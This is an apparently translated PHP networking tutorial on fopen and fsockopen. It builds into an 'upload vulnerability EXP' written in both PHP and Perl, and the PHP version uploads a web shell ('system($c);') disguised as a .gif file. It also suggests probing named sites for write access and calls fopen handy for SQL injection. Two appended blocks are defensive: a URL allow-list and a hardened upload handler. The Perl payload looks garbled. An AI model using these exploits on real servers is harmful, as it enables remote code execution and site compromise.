The previous section covered command-line operation. For more, see
http://www.php.net/manual/en/features.commandline.php
1. fopen application
fopen can also be regarded as a packaged socket function. It is used not only for reading files but also for sockets. fopen is comparable to other high-level INET controls/classes and works at a higher level for URL operations than fsockopen.
How to use fopen
    $s = fopen($url, mode);
fopen's mode parameter:
Mode   Description
'r'    Open for reading only; place the file pointer at the beginning of the file.
'r+'   Open for reading and writing; place the file pointer at the beginning of the file.
'w'    Open for writing only; place the file pointer at the beginning of the file and truncate the file to zero length. If the file does not exist, attempt to create it.
'w+'   Open for reading and writing; place the file pointer at the beginning of the file and truncate the file to zero length. If the file does not exist, attempt to create it.
'a'    Open for writing only; place the file pointer at the end of the file. If the file does not exist, attempt to create it.
'a+'   Open for reading and writing; place the file pointer at the end of the file. If the file does not exist, attempt to create it.
'x'    Create and open for writing only; place the file pointer at the beginning of the file. If the file already exists, the fopen() call fails, returns FALSE and generates an E_WARNING level error. If the file does not exist, attempt to create it. This is equivalent to specifying the O_EXCL|O_CREAT flags for the underlying open(2) system call. This option is supported by PHP 4.3.2 and later, and only for local files.
'x+'   Create and open for reading and writing; place the file pointer at the beginning of the file. If the file already exists, the fopen() call fails, returns FALSE and generates an E_WARNING level error. If the file does not exist, attempt to create it. This is equivalent to specifying the O_EXCL|O_CREAT flags for the underlying open(2) system call. This option is supported by PHP 4.3.2 and later, and only for local files.
In other words, the operations used on local files can also be used for inet. Pretty cool, isn't it?
If you want to test whether a site's IIS directory is writable, you can write:
    $s = fopen("http://www.bugkidz.org", "x") or die("There is no write permission");
If it succeeds, you can go on to construct the following statements and write files remotely with fwrite.
But most websites are read-only.
    $s = fopen("http://www.bugkidz.org/index.php?id=1", "r");
This reads http://www.bugkidz.org/index.php?id=1, but the stream has to be processed in a loop to get the full content, for example:
    while (!feof($s)) {
        echo fgets($s, 1024);
    }
I think fopen is the most convenient for SQL injection.
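    function phpinet($url) {
        // Open the URL read-only through the HTTP stream wrapper
        $s = fopen($url, "r") or die("Open URL Error");
        $cache = "";
        // Read line by line until the end of the stream
        while (!feof($s)) {
            $cache .= fgets($s, 1024);
        }
        // Close the stream before returning the collected content
        fclose($s);
        return $cache;
    }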
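Because fopen() decides from the string's prefix whether it is opening a URL or a local path, code that passes a caller-supplied $url to it, as the function above does, should constrain what it will open. One way to do that, as an added example that is not from the original article; ALLOWED_HOSTS, url_rejection() and open_remote() are hypothetical names:

```php
<?php
// Added example, not the article's code. ALLOWED_HOSTS, url_rejection()
// and open_remote() are hypothetical names.
const ALLOWED_HOSTS = ['www.example.com'];

// Returns null when $url may be fetched, otherwise the reason it is refused.
function url_rejection(string $url): ?string
{
    $p = parse_url($url);
    // No scheme means fopen() would treat the string as a local path.
    if ($p === false || !isset($p['scheme'])) {
        return 'no scheme';
    }
    // fopen() also understands file://, ftp://, php://, data:// and others.
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return 'scheme not allowed';
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return 'credentials in URL';
    }
    if (!isset($p['host']) || !in_array(strtolower($p['host']), ALLOWED_HOSTS, true)) {
        return 'host not on allow-list';
    }
    return null;
}

function open_remote(string $url)
{
    if (($why = url_rejection($url)) !== null) {
        throw new InvalidArgumentException("refusing $url: $why");
    }
    // The http(s) wrapper is read-only, so 'r' is the only useful mode.
    $ctx = stream_context_create(['http' => [
        'timeout' => 5,
        'follow_location' => 0,   // a redirect could leave the allow-list
    ]]);
    $s = @fopen($url, 'r', false, $ctx);
    if ($s === false) {
        throw new RuntimeException("cannot open $url");
    }
    return $s;
}

// Constructed inputs; only the validation runs, nothing is fetched.
foreach (['index.php', 'file:///etc/hosts', 'ftp://www.example.com/a',
          'http://intranet.invalid/', 'http://www.example.com/index.php?id=1'] as $u) {
    printf("%-40s %s\n", $u, url_rejection($u) ?? 'allowed');
}
```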
The phpinet() function above is equivalent to using fsockopen. fsockopen is also a packaged socket function, a bit like the Winsock control in VB. Unfortunately, it only supports active (outgoing) socket connections and does not support bind, listen, and so on. If you need those features, you should use advanced socket programming in PHP. Even so, fsockopen can meet most needs.
Usage of fsockopen:
    resource fsockopen(string target, int port [, int errno [, string errstr [, float timeout]]])
    $sock = fsockopen("192.168.0.1", 80, $errno, $errstr, 30);
The first two arguments are the address and port, the middle two are the error-related variables, and the last one sets the timeout. Usually this is enough:
    $sock = fsockopen("192.168.0.1", 80);
This is a typical TCP connection. A UDP connection looks like this:
    $sock = fsockopen("udp://192.168.0.1", 53);
Writing a TFTP client this way is also possible.
fsockopen application examples
Example 1: a simple HTTP session.
    <?php
    $fp = fsockopen("www.example.com", 80, $errno, $errstr, 30);
    if (!$fp) {
        echo "$errstr ($errno)\n";
    } else {
        // Build the request, send it, then read the response to EOF
        $out = "GET / HTTP/1.1\r\n";
        $out .= "Host: www.example.com\r\n";
        $out .= "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        while (!feof($fp)) {
            echo fgets($fp, 128);
        }
        fclose($fp);
    }
    ?>
The process is usually: create the fsockopen resource, define the content to send, write it with fwrite or fputs, read the response line by line with fgets until the end of the file is reached, and close the fsockopen resource with fclose.
Angel wrote a PHP port scanning tool, posted at http://www.4ngel.net/Article/20.htm
Choosing fsockopen to write a simple EXP that sends packets is definitely a good idea, because it's so easy. Look at my PHP upload vulnerability EXP.
    <?php
    # msn: CQxy [at] 21cn.net
    $sock = fsockopen("www.ririririri.com", 80);
    if (!$sock) {
        echo "cannot connect it!";
        exit;
    }
    // multipart/form-data body: a "PATH" field and an "image" file part
    $body = "-----------------------------7D41F4A600472\r\n" .
        "Content-Disposition: form-data; name=\"PATH\"\r\n" .
        "\r\n" .
        "www.ppp\r\n" .
        "-----------------------------7D41F4A600472\r\n" .
        "Content-Disposition: form-data; name=\"image\"; filename=\"f:\\tools\\1.gif\"\r\n" .
        "Content-Type: text/plain\r\n" .
        "\r\n" .
        "<?php\r\n" .
        "system($c);\r\n" .
        "?>\r\n" .
        "-----------------------------7D41F4A600472--\r\n" .
        "\r\n";
    // Request line and headers; Content-Length is computed from the body
    $header = "POST /index.php?action=upload HTTP/1.1\r\n" .
        "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*\r\n" .
        "Referer: http://127.0.0.1/index.php?path=.\r\n" .
        "Accept-Language: en-cn\r\n" .
        "Content-Type: multipart/form-data; boundary=---------------------------7D41F4A600472\r\n" .
        "Accept-Encoding: gzip, deflate\r\n" .
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)\r\n" .
        "Host: 127.0.0.1\r\n" .
        "Content-Length: " . strlen($body) . "\r\n" .
        "Connection: Keep-Alive\r\n" .
        "Cache-Control: no-cache\r\n" .
        "Cookie: PHPSESSID=111111111111111111111111111111111111111111111111\r\n" .
        "\r\n";
    fputs($sock, $header);
    sleep(1);
    fputs($sock, $body);
    while (!feof($sock)) {
        echo fgets($sock, 128);
    }
    fclose($sock);
    ?>
Now let's look at the same EXP written in Perl.
    #!/usr/bin/perl
    $| = 1;
    use Socket;
    $host = "127.0.0.1";
    $port = "80";
    $uploadto = "";
    # multipart/form-data body: a "PATH" field and an "image" file part
    $str = "-----------------------------7D41F4A600472\r\n" .
        "Content-Disposition: form-data; name=\"PATH\"\r\n" .
        "\r\n" .
        "www.ppp\r\n" .
        "-----------------------------7D41F4A600472\r\n" .
        "Content-Disposition: form-data; name=\"image\"; filename=\"f:\\tools\\1.gif\"\r\n" .
        "Content-Type: text/plain\r\n" .
        "\r\n" .
        "?>\r\n" .
        "?>\r\n" .
        "-----------------------------7D41F4A600472--\r\n" .
        "\r\n";
    print $str;
    $len = length($str);
    print $len;
    $req = "POST /1/1/3721/index.php?action=upload HTTP/1.1\r\n" .
        "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*\r\n" .
        "Referer: http://127.0.0.1/index.php?path=.\r\n" .
        "Accept-Language: en-cn\r\n" .
        "Content-Type: multipart/form-data; boundary=---------------------------7D41F4A600472\r\n" .
        "Accept-Encoding: gzip, deflate\r\n" .
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)\r\n" .
        "Host: 127.0.0.1\r\n" .
        "Content-Length: $len\r\n" .
        "Cache-Control: no-cache\r\n" .
        "Cookie: PHPSESSID=11111111111111111111111111\r\n" .
        "\r\n" .
        "$str\r\n\r\n";
    print $req;
    @res = sendraw($req);
    print @res;
    #hmm... Maybe you can send it by other way
    sub sendraw {
        my ($req) = @_;
        my $target;
        $target = inet_aton($host) || die("inet_aton problems\n");
        socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die("socket problems\n");
        if (connect(S, pack "SnA4x8", 2, $port, $target)) {
            # Write the request to the socket, then read the whole response
            select(S);
            $| = 1;
            print $req;
            my @res = <S>;
            select(STDOUT);
            close(S);
            return @res;
        } else {
            die("Can't connect...\n");
        }
    }
Which one is simpler is clear at a glance. You should now have a certain understanding of how to use fsockopen. Next time I will talk about advanced PHP sockets programming. A more powerful PHP will surprise you.
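Both requests above send PHP source in the "image" part under a .gif filename, and the filename, the part's Content-Type and the PATH field are all chosen by the client. A receiving handler that ignores those values and decides from the stored bytes, as an added example that is not part of the original article; UPLOAD_DIR, ALLOWED, classify_upload() and store_uploaded_image() are assumed names:

```php
<?php
// Added example, not the article's code. UPLOAD_DIR, ALLOWED and both
// function names are assumptions made for illustration.
const UPLOAD_DIR = '/srv/app-data/uploads';  // assumed: outside the web root
const ALLOWED = ['image/gif' => 'gif', 'image/jpeg' => 'jpg', 'image/png' => 'png'];

// Decide the type from the bytes on disk; returns an extension or null.
function classify_upload(string $tmpPath): ?string
{
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime === false || !isset(ALLOWED[$mime])) {
        return null;
    }
    // The file must also parse as an image, not just carry magic bytes.
    if (@getimagesize($tmpPath) === false) {
        return null;
    }
    return ALLOWED[$mime];
}

// $file is one entry of $_FILES, e.g. $_FILES['image'].
function store_uploaded_image(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    $ext = classify_upload($file['tmp_name']);
    if ($ext === null) {
        throw new RuntimeException('not an accepted image');
    }
    // $file['name'] and any client-supplied path field are never used: the
    // name and extension are generated here, so even an image that still
    // contains PHP text cannot be stored under a .php name.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Constructed samples: a text file with PHP tags and a 1x1 GIF.
if (PHP_SAPI === 'cli') {
    $samples = [
        'php-as-gif' => "<?php echo 'not an image'; ?>\r\n",
        'real-gif'   => base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'),
    ];
    foreach ($samples as $label => $bytes) {
        $tmp = tempnam(sys_get_temp_dir(), 'up');
        file_put_contents($tmp, $bytes);
        printf("%-10s => %s\n", $label, classify_upload($tmp) ?? 'rejected');
        unlink($tmp);
    }
}
```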